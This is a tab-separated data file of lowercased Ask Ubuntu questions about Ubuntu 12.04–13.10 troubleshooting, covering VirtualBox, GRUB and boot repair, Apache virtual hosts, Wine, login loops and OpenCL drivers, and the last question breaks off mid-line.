372982	virtualbox 4.3 guest additions on osx guest	im running virtual box 4.3 on ubuntu 13.10 , everything goes fine with windows guests but for mac osx ( mountain lyon ) i just cant find how to install guest additions . seems like there 's no osx installer in the iso . thanks in advance-
372988	enable both : two finger scrolling and edge scrolling in ubuntu 13.10 permanantly	recently , i have upgraded from 13.04 to 13.10 . first , i found problem in edge scrolling . after surfing in net about the problem i came to know that ubuntu 13.10 has default two-finger scroll option enabled in mouse and touchpad setting . after unchecking two-finger scroll edge scrolling was enabled . in windows , i have used both feature . how can i use both two finger scrolling and edge scrolling in ubuntu 13.10 permanently so that the setting wo n't reset even after i restart , shutdown or suspend my laptop ?
372990	data does n't get transferred correctly to usb , why ?	i have ubuntu 13.10 , and whenever i copy something to usb sometimes it works but mostly when i check the data on other machine ( with windows or ubuntu ) it shows nothing or if it does then its partial data for example if it was a movie or a video then it would be of few minutes not full video , same case is with any other files . i have tried to format the usb several times and send the data again , but it does n't do anything , and sometimes it transfer the data perfect . so i do n't know what exactly i should do ? note : i have tried many usb 's
372991	with which command in `` terminal '' can i connect to internet ?	i errased some ubuntu programs in ubuntu 10.4 and now i just can work with `` terminal '' . all my directories are still there but i wish to recover the graphical presentation . but because i need the internet to download some programs , a terminal-command is asked . thanks .
372992	not able to upgrade from 12.04 to 13.04 or above	i am usng ubuntu 12.04 lts want to upgrade to 13.04 or above . i have followed the steps provided in the ubuntu forum but that is not working for me . i run the update manager and it updates a whole lot of things but the os version never upgrades . please advise a solution . i am using ubuntu desktop .
372993	how can i see a representation of a non-fast-forward git update ?	i am trying to git push origin master and getting the error ! [ rejected ] master - > master ( non-fast-forward ) . i understand what the error means . ( 1 ) however , i want to decide whether or not to -- force the update anyway . to do this i need to see and compare the commits my local branch and the target remote branch . how can i see them side by side ? i would prefer to use a gui tool like gitg , but a readable command-line option will suffice . ( 1 ) it means that my local branch is not a direct descendant of the target remote branch . this is explained in : note about fast-forwards ( git documentation ) github help what does it mean that a git push can not be fast foward merged ? ( stackoverflow ) ... and more besides
372995	convert webm to jpg or png	i found many .webm videos on the net and i want to know if it 's possible to extract images from these . some videos i found have amazing images and i would like to set one of the frames as wallpaper . i am using 12.04 , thanks .
372997	grub rescue issue	i used my laptop ( which has windows 7 installed on the hard drive ) to install ubuntu 12.04 from a dvd to a usb stick . the operation said it completed but the usb stick would not boot . only got a cursor in the upper left corner of the display . i rebooted the laptop without the dvd and stick and now is comes up with error : no such device : 47ce9a0d-797f-47c2-88f8-1c5a4ac1b14d how can i get back to my os on the hard drive ? the usb stick and dvd have been removed . it appears that the install from dvd to usb modified the disk drive by installing grub on it and now the system is trying to find a bootable stick on power up . do n't know how to remove the grub from it so i can boot from windows .
372999	how do i stop one of my installed fonts from overriding other web fonts ?	i installed a font with font-viewer ( helvetica neue , if it matters ) and now many websites ( notably youtube ) are displayed with that font . this is especially annoying since helvetica neue is a very thin and hard to read font . hopefully i can stop it from showing up on the internet and keep the font , but i 'm not opposed to removing it all together . but for some reason , i ca n't find it in my /usr/share/fonts folder ... i 'm running xubuntu 13.10 , my web browser is chrome version 30
373000	installing call of duty : modern warfare 2 on wine 1.6	i am using ubuntu 13.10 , and wine 1.6 i was installing mw2 setup.exe , its showing me this message '' runtime error ( at-1:0 ) : can not import dll : c\users\abhinav\temp\is-i0kmo.tmp\isskin.dll . '' please help me on this .
373001	how to repair log files	accidentally i delete /var/log folder my question is now can i recreate that folder again ( and to work ) i have some issues on apache , and i ca n't see any logs because the /var/log folder do n't exist anymore..
373006	command prompt stuck on same line	sometimes ( rarely ) it happens that when i hit enter on a terminal , the command prompt does n't go to the next line , but it gets printed again on the same line . my work around is to simply close the terminal and open a new one . is there any way to avoid this ?
373007	error message in qtiplot	i have recently installed qti plot in my ubuntu 12.04 lts for the purpose of making plots . i can draw plots by manually entering data . but whenever i try to browse and import a data file ( e.g . *.qti , *.xls , *.dat ) , the application closes showing an error message `` an unexpected error has occured '' . i uninstalled the application and again installed it but still the same problem persists . how this can be resolved ?
373011	which flavor of ubuntu works on asus p4ge mx mobo with p4 and 1gb ram	i have ubuntu 13.10 installed on asus p4ge mx mother board with intel 845 chip set and pentium 4 processor with 1gb ram . unity and dash are not loaded , hence not able to close any page opened by right clicking on blank desktop and entering into 'change desktop background ' . live wall papers are working but the setting page is not closing as no buttons are available on the panel . i removed ubuntu 13.10 and tried with 13.04 / 12.10 / 12.04 / 11.10 and 11.04 . ubuntu 11.04 is working but the problem is that it out of date and upgrades available . please provide a way / solution
373013	13.10 suspend/resume failure	since upgraded to saucy , my laptop hangs occasionally when trying to resume from suspend ( once in every 5 attempts ) , the only way to regain control of the computer is by performing a hard reboot . after that an i 'm presented with this window :
373016	how to turn ubuntu into lxde without a fresh system instruction ?	i would like to know how to convert ubuntu into lubuntu , without a fresh installation of the system .
373017	ubuntu desktop showing default color with no left nav or top navs after login and xrdp install	i wanted to configure remote desktop on my perfectly running ubuntu desktop 12.04 lts version . i followed the below steps : sudo apt-get install xrdp -- - this went well nothing was coming up from remote machine , so i then did the following echo `` gnome-session -- session=ubuntu-2d '' > ~/.xsession even this did n't help and started throwing some error . then i ran the following command : sudo apt-get install gnome-session-fallback then i changed issued the following command : echo `` gnome-session -- session=gnome-fallback '' > ~/.xsession still no use . it just shows login screen , once i type in the password , it is just blank ( not black , but default ubuntu screen ) with no icons . however , remote desktop now works great . can someone help me , getting my normal ubuntu desktop back , please ? ?
373018	ubuntu 13.04 unexpected shut down problem	i am using ubuntu 13.04 since quite a lot time and from the past few months i am getting a weird problem which is it gets shutdown unexpectedly . what i have observed is whenever i am playing some video from the youtube/vlc player , the shutdown chances are high . i am not sure for what reason i am getting this problem . i am not able to solve the problem . any kind of help would be appreciated . thanks in advance .
373020	how to force installation of nemo version 1.x and not 2.x ?	i 've installed nemo as a file-manager but since version 2.0 got released , there is the problem with the desktop rendering , as described here . how can i install the latest version of nemo before 2.0 ?
373021	a problem occurs when i try to install utorrent	i found the commands to install utorrent in a post on this website . when i run this command : sudo ln -s /opt/utorrent-server-v3_0/utserver /usr/local/bin/utserver it says : ln : failed to create symbolic link â/usr/local/bin/utserverâ : file exists what to do ?
373023	dell optiplex 780 no wifi found	dell optiplex 780 intel ( r ) core ( tm ) 2 duo cpu e7500 @ 2.93ghz ram is 6.00 gb x64 os machine and i have never had a problem with installing ubuntu before and recognizing any type of wireless or wifi connections before this . is there some way around this ? the actual installation of ubuntu 12.04 was fast and clean but no wifi . it told me there was none detected . what is the problem ? any help would be appreciated , thank you in advance .
373026	making a link to a folder on windows ?	sorry but i am just very new to ubuntu and i ca n't get the answer via search or google , because there are too many options and nothing seems to help me with my problem . i have one hard disk in my small notebook . i 've made a new partition to install linux and i can still open my folders on c : / , where windows is actually installed . now i want to make a link on my desktop for example from my music folder from windows . how can i do that ? i tried some ways , but after a reboot the system always claims that the link doesnt work anymore . what can i do ? thx
373027	virtual vs actual disk size running ubuntu 13.10 64/virtualbox 4.3 on mavericks	i am relatively new to ubuntu running or a virtualbox ( on a mac ) , and after everything was working more or less fine before i upgraded to mavericks , now i find a lot of problems with it . not sure what 's going on , but my ubuntu machine had dynamically allocated space , and i do n't recall having any problems expanding the disk . my virtual size is 20gb , actual size is 8gb . luis @ luis-virtualbox : ~ $ sudo fdisk -l /dev/sda disk /dev/sda : 21.5 gb , 21474836480 bytes 255 heads , 63 sectors/track , 2610 cylinders , total 41943040 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001edac device boot start end blocks id system /dev/sda1 * 2048 17367039 8682496 83 linux /dev/sda2 17369086 41940991 12285953 5 extended /dev/sda5 17369088 41940991 12285952 82 linux swap / solaris now , i am trying to install additional software in ubuntu , and the machine indicates that i am running out of space . luis @ luis-virtualbox : ~ $ df -h filesystem size used avail use % mounted on /dev/sda1 8.1g 7.6g 96m 99 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 5.8g 4.0k 5.8g 1 % /dev tmpfs 1.2g 1.0m 1.2g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 5.8g 156k 5.8g 1 % /run/shm none 100m 44k 100m 1 % /run/user desktop 699g 386g 313g 56 % /media/sf_desktop documents 699g 386g 313g 56 % /media/sf_documents dropbox 699g 386g 313g 56 % /media/sf_dropbox my_passport 932g 363g 570g 39 % /media/sf_my_passport /dev/sr0 62m 62m 0 100 % /media/luis/vboxadditions_4.3.0_89960 additional information : luis @ luis-virtualbox : ~ $ sudo fdisk -l /dev/sda1 disk /dev/sda1 : 8890 mb , 8890875904 bytes 255 heads , 63 sectors/track , 1080 cylinders , total 17364992 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sda1 does n't contain a valid partition table how can i fix this problem ? does anybody know why the machine is not dynamically allocating the space i need , up to 20gb ? thanks is advance for any help .
373029	setting up filesystem	i recently made the switch to linux , and am running it off of my 64gb ssd , my computer also has a 750 gb hdd under the hood ( lenovo ideapad y570 ) . seeing that i will eventually obtain a lot of data ( running dreamweaver and other adobe cs applications through wine ) i was wondering if it was possible to switch my program files ( lib/lib64 ) as well as documents over to my hdd so as not to fill up my ssd . i am new to linux and the command line so any help is appreciated . thanks
373031	how to search within my zotero library from the dash using smart scopes ( ubuntu 13.10 )	i assumed that the smart scopes zotero plugin would allow me to search files from my library in the dash . however , i am not able to get any results when selecting the zotero plugin in the filter section of the dash . how does it work , where is it supposed to look ? i do n't get results from scholar either . i have checked that online search is activated in the privacy settings .
373032	wpa2 entreprise lubuntu problems	i just installed lubuntu on an old old laptop of mine ( to give you an idea , it has 256mb or ram and a celeron m cpu ; d ) the network interface card was not working on lubuntu therefore i had to use this in the terminal '' sudo apt-get install firmware-b43-installer '' i can connect to my router at home ( it is using wpa2 security ) and everything is working fine here . the problem is when i go at my school and try to connect on a wpa2entreprise secured wifi network . i get a few problems there . i will normally login typing in my username and my password and pressing login , afterwards , it will ask for a ca certification ( it is not needed ) so i press ignore . then here comes my problem , first of all , my computer wo n't connect to the wifi network even through i entered everything correctly . second of all , it will also ask me my password over and over again . any help ? thanks : ) tldr ; lubuntu wo n't connect me to wpaenterprise wifi and keeps asking me my password over and over . help me out .
373035	restricted-extras available in ubuntu 12.10 demo version	i 'm new to ubuntu . before installing , i wanted to try it first . but , whenever i want to play media files using rhythmbox , it says `` python ( v2.7 ) requires to install plugins to play media files of the following type : mpeg-1 layer 3 ( mp3 ) decoder '' . i searched a bit on the net , and for that i 'm required to install restricted-extras . but there 's no option of `` install '' in ubuntu software center . when i tried through terminal it said , `` e : unable to locate package ubuntu-restricted-extras '' . currently , i 'm using ubuntu through bootable usb . so , is the restricted-extras package not available in demo version ? ? ? i need to install ubuntu to use them ?
373037	apache2 ip-based virtual host support	i have 3 site on the same apache2 ( up-to-data ubuntu ) server . they each have their own ip . each site has its own file in `` sites-enabled '' . apache2 seems to be running fine : /var/log/apache2/error.log only says : [ fri nov 08 12:30:12 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.4.6-1ubuntu1.4 configured -- resuming normal operations the dns files seem ok : i did not modify them and no program modified them either . they used to function before . i 'll post a copy if someone asks me to do it . when i point a browser to the second and third site ( to their domain names or to their ip adresses ) , it just hangs until timeout . same with a ping : ping 92.243.20.169 : ok ping 92.243.21.141 : 100 % packet loss ping 92.243.4.114 : 100 % packet loss ip addr 1 : lo : < loopback , up , lower_up > mtu 16436 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00:16:3e:93:68 : c0 brd ff : ff : ff : ff : ff : ff inet 92.243.20.169/22 brd 92.243.23.255 scope global eth0 inet6 2001:4b98 : dc0:45:216:3eff : fe93:68c0/64 scope global dynamic valid_lft 2591871sec preferred_lft 604671sec inet6 fe80 : :216:3eff : fe93:68c0/64 scope link valid_lft forever preferred_lft forever 3 : eth1 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00:16:3e:84:91:0a brd ff : ff : ff : ff : ff : ff inet 92.243.21.141/22 brd 92.243.23.255 scope global eth1 inet6 2001:4b98 : dc0:45:216:3eff : fe84:910a/64 scope global dynamic valid_lft 2591871sec preferred_lft 604671sec inet6 fe80 : :216:3eff : fe84:910a/64 scope link valid_lft forever preferred_lft forever 4 : eth2 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00:16:3e:1f:2d:85 brd ff : ff : ff : ff : ff : ff inet 92.243.4.114/21 brd 92.243.7.255 scope global eth2 inet6 2001:4b98 : dc0:41:216:3eff : fe1f:2d85/64 scope global dynamic valid_lft 2591952sec preferred_lft 604752sec inet6 fe80 : :216:3eff : fe1f:2d85/64 scope link valid_lft forever preferred_lft forever ifconfig eth0 link encap : ethernet hwaddr 00:16:3e:93:68 : c0 inet addr:92.243.20.169 bcast:92.243.23.255 mask:255.255.252.0 inet6 addr : 2001:4b98 : dc0:45:216:3eff : fe93:68c0/64 scope : global inet6 addr : fe80 : :216:3eff : fe93:68c0/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9550641 errors:0 dropped:3 overruns:0 frame:0 tx packets:3749560 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:953636357 ( 953.6 mb ) tx bytes:6983319124 ( 6.9 gb ) interrupt:27 eth1 link encap : ethernet hwaddr 00:16:3e:84:91:0a inet addr:92.243.21.141 bcast:92.243.23.255 mask:255.255.252.0 inet6 addr : 2001:4b98 : dc0:45:216:3eff : fe84:910a/64 scope : global inet6 addr : fe80 : :216:3eff : fe84:910a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5797827 errors:0 dropped:3 overruns:0 frame:0 tx packets:34854 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:607191525 ( 607.1 mb ) tx bytes:1464788 ( 1.4 mb ) interrupt:28 eth2 link encap : ethernet hwaddr 00:16:3e:1f:2d:85 inet addr:92.243.4.114 bcast:92.243.7.255 mask:255.255.248.0 inet6 addr : 2001:4b98 : dc0:41:216:3eff : fe1f:2d85/64 scope : global inet6 addr : fe80 : :216:3eff : fe1f:2d85/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:9231950 errors:0 dropped:2 overruns:0 frame:0 tx packets:29473 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:914989353 ( 914.9 mb ) tx bytes:1349244 ( 1.3 mb ) interrupt:29 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:11570 errors:0 dropped:0 overruns:0 frame:0 tx packets:11570 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1135320 ( 1.1 mb ) tx bytes:1135320 ( 1.1 mb ) netstat -a active internet connections ( servers and established ) proto recv-q send-q local address foreign address state tcp 0 0 * : mysql * : * listen tcp 0 0 * : gandi-agent * : * listen tcp 0 0 * : ftp * : * listen tcp 0 0 * : ssh * : * listen tcp 0 368 charlotte : ssh reverse-27.fdn.fr:37999 established tcp6 0 0 [ : : ] : http [ : : ] : * listen tcp6 0 0 [ : : ] : ssh [ : : ] : * listen tcp6 0 0 charlotte : http ks4000493.ip-198-:61519 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61352 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61442 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61209 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61550 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61421 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61579 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61606 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61386 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61469 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61275 time_wait tcp6 0 0 charlotte : http ks4000493.ip-198-:61247 time_wait active unix domain sockets ( servers and established ) proto refcnt flags type state i-node path unix 3 [ ] dgram 2346 /dev/log unix 2 [ acc ] stream listening 229 @ /com/ubuntu/upstart unix 2 [ acc ] stream listening 3598978 /var/run/mysqld/mysqld.sock unix 2 [ acc ] seqpacket listening 430 /run/udev/control unix 3 [ ] stream connected 3597550 unix 3 [ ] stream connected 3597549 unix 2 [ ] dgram 3597541 unix 3 [ ] stream connected 709 @ /com/ubuntu/upstart unix 3 [ ] stream connected 706 unix 3 [ ] dgram 438 unix 3 [ ] dgram 437 unix 3 [ ] stream connected 393 @ /com/ubuntu/upstart unix 3 [ ] stream connected 390 /etc/apache2/sites-enabled/001-www.lapf.eu < virtualhost 92.243.20.169:80 > serveradmin admin @ 92.243.20.169 documentroot /srv/d_charlotte/www/www.lapf.eu/htdocs/ < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > /etc/apache2/sites-enabled/002-www.felkin.info < virtualhost 92.243.21.141:80 > serveradmin admin @ 92.243.21.141 documentroot /srv/d_charlotte/www/www.felkin.info/htdocs < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > /etc/apache2/sites-enabled/003-www.seidhr.fr < virtualhost 92.243.4.114:80 > serveradmin admin @ 92.243.4.114 documentroot /srv/d_charlotte/www/www.seidhr.fr/htdocs < directory / > options followsymlinks allowoverride none < /directory > < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > what do i have to do next ?
373039	post 13.10 upgrade unity and other apps uninstall themselves	i recently updated from 13.04 to 13.10 using the software update application . everything seems to be working fine , until i restart the computer - at which point some of the apps that i have installed seem to magically stop showing up ( as if they were not installed ) and unity does not show up at all . how do i : a ) diagnose this issue b ) solve it so that everytime i restart i do n't have to reinstall unity and apps .
373040	does ubuntu , work well in a nokia lumia 820 ?	i do n't have nokia 's pc suit installed in my pc . i am wondering if i can try it - without permanent os re-write . ( uk o2 carrier ) 4g phone - but think it 's on hdpsa* ( i have backed up & upgraded roms on older phones in the past - xdadev 's )
373043	change directory command to desktop	when i open up the terminal and write the command cd desktop also i have tried cd /desktop a message appears that no file or directory was found what i suppose to do ? i have logged in as a root but still have the same problem any help ?
373047	i used wget to download html files , where are the images in the file stored ?	firefox was loading very slow , so i decided to use wget to save html files.i used the following command , wget http : //textbook.s-anand.net/ncert/class-xii/chemistry/hello-this-first-chapter the files have been saved in my home folder.but i do n't know where the images are stored.i need them to use in anki . so where are the images stored ?
373048	ubuntu alongside windows8 , grub does n't show up and ubuntu nonexistent in boot menu	i have had a fight with my computer for 2 days now . after running boot-repair multiple times in different ways , it always comes down to this . http : //paste.ubuntu.com/6382341/ also this seems to be part of the problem . ''locked-esp detected . you may want to retry after creating a /boot/efi partition ( fat32 , 100mb~250mb , start of the disk , boot flag ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot/efi partition : ] option of [ boot repair ] . '' so i installed ubuntu 12.04. alongside with pre-installed windows 8 on lenovo g500 . i used it successfully for a few days for various programming tasks , installing software , plug ins , etc.. everything worked perfectly . but after that i rebooted to windows and used that for a day or two . now a few days ago that i tried to return to ubuntu , the grub option does n't show up at all and i 'm directed directly to windows8 from star up . i tried going to bios and boot menu , but neither of those show ubuntu . i started my computer now from a usb drive with ubuntu , and that recognizes that i have ubuntu installed on my computer already . so the ubuntu still is there , it 's been recognized , but i ca n't access it . i have secure boot disabled and from the power options the other option unticked ( quick start up or something ) . i 've gone through a lot of posts and googling for different solutions . but this time nothing seemed to work and i 'm helpless . as far as i have understood the problem of 'no boot loader is installed in the mbr of /dev/sda ' is because it 's somehow hidden by windows , so i need to make it visible for boot-repair ? and this i do n't know 'syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb ' ... i 'm quite lost . help appreciated here , thank you !
373054	problem while upgrading from 13.04 to 13.10 version	hello i was trying to update my ubuntu version then i get this problem . an unresolvable problem occurred while calculating the upgrade . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu can somebody help me ? thank you .
373055	building opengl 3+ in ubuntu under virtualbox/vmware	for a computer graphics class we will be developing opengl 3+ applications . i have installed ubuntu under both vmware and virtualbox , and installed there respective guest additions . if i run glxinfo | grep `` opengl version '' i get opengl version string : 2.1 chromium 1.9 is there any way that opengl 3+ is supported in a virtual machine ( with ubuntu as guest ? ) info : the host is windows 8 64bit intel i7-920 , nvidia 560ti gpu . thank you in advance ! edit : forgot to mention that because this is academic , software rendering using opengl 3+ is also ok . i find mesa3d promising , but ca n't find enough information on how to install in ubuntu and force software rendering ( using opengl 3+ ) . any information is welcome .
373057	my ubuntu 13.10 wo n't print on my hp psc1215 using my network connection	i have installed ubuntu 13.10 on my acer one aspire netbook , it works fine with email receive and send ok . i have been trying to network my machine with my hp psc 2515 with limited success , the printer recognises that data has been received but wo n't print it . do i need to download a driver ? and from where ? novice with ubuntu
373060	cant log into ubuntu as main/only user but can as guest	up graded to ubuntu 13.10. all ok then installed updates and afterwards trying to log in as usual just produced a loop of repeated login screens , but logging in as guest worked ok . i think the problems may have been exacerbated by changing some permissions in my home directory . i have read these forums but i am unclear about how to execute some of the replies and concerned about making things worse . i can open a terminal ok . i have tried xdg_config_home=/home/myuser/.config . pressed enter but nothing happens . cursor just flashes . please explain how to use the terminal to log in and any codes i can try to get my normal login back . thanks
373063	gnu/linux interactive table content gui editor ?	i often find myself in the need to gather data ( say from the internet ) , into a table , for comparison reasons . i usually need the final table output in html or mediawiki mostly , but often times also latex . my biggest problem is that i often forget the correct table syntax for these markup languages , as well as what needs to be properly escaped in the inline data , for the table to render correctly . so , i often wish there was a gui application , which provides a tabular framework - which i could stick `` always on top '' as a desktop window , and i could paste content into specific cells - before finally exporting the table as a code in the correct language . one application that partially allows this is open/libreoffice calc : the good thing here is that : i can drag and drop browser content into a specifically targeted table cell ( here b2 ) '' rich '' text / html code gets pasted for long content , the cell ( column ) width stays put as it originally was the bad thing is , that : when the cell height ( due to content size ) becomes larger than the calc window , it becomes nearly impossible to scroll calc contents up and down ( at least with the mousewheel ) , as the view gets reset to top-right corner of the selected cell calc shows an `` endless '' /unlimited field of cells , so not exactly a `` table '' - which i find visually very confusing ( and cognitively taxing ) can only export table to html what i would need is an application that : allows for a limited size table , but with quick adding of rows and columns ( e.g . via corresponding + buttons ) allows for quick setup of row and column height and width ( as well as table size ) stays put at those sizes , regardless of size of content pasted in ; if cell content overflows , cell scrollbars are shown ( cell content could be possibly re-edited in a separate/new window ) ; if table overflows over window size , window scrollbars are shown exports table in multiple formats ( i 'd need both html and mediawiki ) , properly escaping cell content for each ( possibility to strip html tags from content pasted in cells , to get plain text , is a plus ) targeting a specific cell in the table for the content paste operation is a must - it does n't have to be drag'n'drop though , a right click over a cell with `` paste content '' is enough . i 'd also want the ability to click in a specific cell and type in ( plain text ) content immediately . so , my question is : is there an application out there that already does something like this ? the reason i 'm asking is that - as the screenshots show - for instance libre/openoffice allows it , but only somewhat ( as using it for that purpose is tedious ) . i know there exist some gui editors for linux ( both for ui like guile or html like amaya ) ; but i do n't know them enough to pinpoint if any of them would offer this kind of functionality ( and at least in my searches , that kind of functionality , if present in diverse software , seems not to be advertised ) . note i 'm not interested in styling an html table , which is why i have n't used `` table designer '' in the title , but `` table editor '' ( in lack of better terms ) - i 'm interested in ( quickly ) adjusting row/column size of the table , and populating it with pasted data ( which is possibly html ) in a gui ; and finally exporting such a table as self-contained html ( or other ) code .
373064	sharing home partition with multtiple os	how to share home partition with multiple os ? i installed arch linux after ubuntu ; but arch it made separate home directory !
373065	uninstall wubi from a bad drive	i used wubi to install ubuntu on its own hard drive . that drive seems to have died and i can no longer boot to ubuntu . i tried to uninstall ubuntu from the control panel in windows 7 and received the message that it could not acces the uninstall file . i want to install ubuntu again on another drive but am concerned about the dual boot that is already on my computer . what do you reccommend
373068	ubuntu 13.10 items in dash are not selctable	since the upgrade to 13.10 i can only select items in dash if all windows are closed . otherwise the clicks are going `` through '' the dash to active application e.g . browser . any ideas ?
373069	shutdown/logoff script in ubuntu 13.10	which would be the best way to run a script upon gui logoff , shutdown , hibernate , sleep modes ? in 12.04 i think i did this in /etc/lightdm/lightdm.conf , but on 13.10 , the folder structure changed and when i create this script , the display manager wont even start upon boot . i am looking to implement a simple automatic truecrypt unmount command truecrypt -d but of course this would go for any script . edit : the file does n't exist , and if i create it and just put the lines session-cleanup-script = /path/to/executable/script.sh , after reboot i ca n't log in anymore until i delete the file anymore . this also happens if the file starts with [ seatdefaults ] session-cleanup-script = ... how come this is not working at all , and/or why the file doesnt exist in the first place ? thanks
373070	tar.gz file encrypted with truecrypt , how to decode it ?	i have installed truecrypt and try it with tar.gz file , where i had some important data . now when i mount this file i just see empty folder , and was not able to find some solution , how to decode the file to be extractable ? is it even possible ? thanks for your time .
373072	no opencl devices ( 13.10 core i5 4430 intel graphics hd )	i 've been looking quite a lot for this but could n't find anything that worked . i have an intel core i5-4430 based system with no extra graphics adapter ( so it 's using the on-board , integrated intel graphics hd that is part of the cpu ) , running ubuntu 13.10 . when running boinc world community grid it says `` no usable gpus '' . when running a bitcoin mining program it says `` no opencl devices '' . i searched the web , found two possible solutions - one was to use the intel opencl driver for xeon platforms , the other was to use the amd driver . tried both . i failed installing the intel driver as there were too many prerequisites that i just did n't manage to install , and the amd installation was quite fast to its size ( it 's 200mb , and took far less than a minute to install ) , but it did n't solve the problem . perhaps i 'm looking in the wrong direction here , i 'm not sure , but is there anyway i can utilize the advance features of my cpu for those distributed computation programs ? update i tried installing the intel driver again ( and failed again ) , and this is the output of install.sh : ~/downloads/intel_sdk_for_ocl_applications_xe_2013_r2_runtime_3.1.1.11385_x64 $ ./install-cpu.sh in case of failure please consult readme file rpm : rpm should not be used directly install rpm packages , use alien instead ! rpm : however assuming you know what you are doing ... error : failed dependencies : /bin/sh is needed by opencl-1.2-base-1:3.1.1.11385-1.x86_64 lsb-core-amd64 > = 4.0 is needed by opencl-1.2-base-1:3.1.1.11385-1.x86_64 libnuma.so.1 ( ) ( 64bit ) is needed by opencl-1.2-base-1:3.1.1.11385-1.x86_64 libstdc++.so.6 ( ) ( 64bit ) is needed by opencl-1.2-base-1:3.1.1.11385-1.x86_64 /usr/sbin/update-alternatives is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 /bin/sh is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 ld-linux-x86-64.so.2 ( ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 ld-linux-x86-64.so.2 ( glibc_2.3 ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 lsb-core-amd64 > = 4.0 is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 libnuma.so.1 ( ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 libstdc++.so.6 ( ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 libstdc++.so.6 ( cxxabi_1.3.1 ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 libstdc++.so.6 ( cxxabi_1.3 ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 libstdc++.so.6 ( glibcxx_3.4 ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 libstdc++.so.6 ( glibcxx_3.4.9 ) ( 64bit ) is needed by opencl-1.2-intel-cpu-1:3.1.1.11385-1.x86_64 i really do n't understand why there are so many missing dependencies . i checked and actually have at least most of them ( /bin/sh , for example . really ? ) also it seems there are many duplicates . regarding the second line , the one that talks about using alien , well i did use alien to convert this package , including scripts , then tried installing using ubuntu 's package manager , but it also failed on missing dependencies . any ideas ? what am i doing wrong ? update 2 following hbdgaf 's link i followed the selected answer instructions and these are my outputs : $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) $ ./capsbasic number of available platforms : 1 platform names : [ 0 ] experiment intel gen 